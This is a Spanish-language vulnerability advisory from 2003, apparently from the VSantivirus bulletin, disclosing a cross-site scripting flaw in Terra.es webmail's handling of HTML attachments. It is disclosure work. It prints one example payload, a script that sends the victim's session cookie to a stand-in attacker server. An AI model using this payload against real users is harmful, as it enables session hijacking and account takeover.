Esta página es un servicio gratuito de Video Soft BBS - SUBSCRIBASE en nuestras listas de correo.

Busque su tema:

VSantivirus  Internet
Proporcionado por FreeFind

Video Soft BBS
Menú Principal
Anti Trojans
Antivirus
Hoaxes
Subscripciones
Otro software
Artículos
Links
Sugerencias
Sobre el BBS
Direcciones
Galería
Chat

Controlado desde el
19/10/97 por NedStat
Vulnerabilidad XSS en el Webmail de Terra.es
 
VSantivirus No. 1106 Año 7, Viernes 18 de julio de 2003

 Vulnerabilidad XSS en el Webmail de Terra.es
http://www.vsantivirus.com/vul-webmail-terra.htm

Vulnerabilidad Cross Site Scripting en el Webmail de Terra.es

Por Odree
odree@mail.com


Descripción:

El problema reside en la gestión de ficheros adjuntos de tipo .html o .htm

Cuando se envía un email en formato HTML a un usuario de Terra.es, el sistema filtra cualquier tipo de código dañino. 

Sin embargo, cuando un usuario recibe un fichero HTML adjunto, el webmail permite abrirlo, dentro del dominio de Terra, sin verificar que este fichero no contiene código malicioso.

De esta forma, un atacante podría enviar un fichero HTML adjunto a un usuario, con código malicioso, 

Si el fichero adjunto contiene un código parecido al siguiente, el atacante tendría datos suficientes como para robar la sesión:

<SCRIPT>document.location.href='www.servidoratacante.com/scriptatacante.php' + document.location.search + '?cookie=' + document.cookie</SCRIPT>

Bastaría programar un pequeño script que automáticamente hiciera las acciones que el atacante deseara.

Alcance de la vulnerabilidad:

Esta vulnerabilidad permite robar la sesión al usuario, con lo que se podría efectuar cualquier acción que pudiera hacer el usuario.

Solución:

De momento no existe solución a esta vulnerabilidad. Como precaución, no debe abrirse ningún fichero HTML adjunto.

Acerca del autor:

Esta vulnerabilidad ha sido descubierta por Odree (odree@mail.com). El autor declina cualquier responsabilidad del uso de la información expresada en este documento.

En estos momentos Odree se encuentra buscando trabajo como consultor de seguridad en cualquier parte del mundo. Si está interesado, contacte en odree@mail.com




(c) Video Soft - http://www.videosoft.net.uy
(c) VSAntivirus - http://www.vsantivirus.com

 

Copyright 1996-2003 Video Soft BBS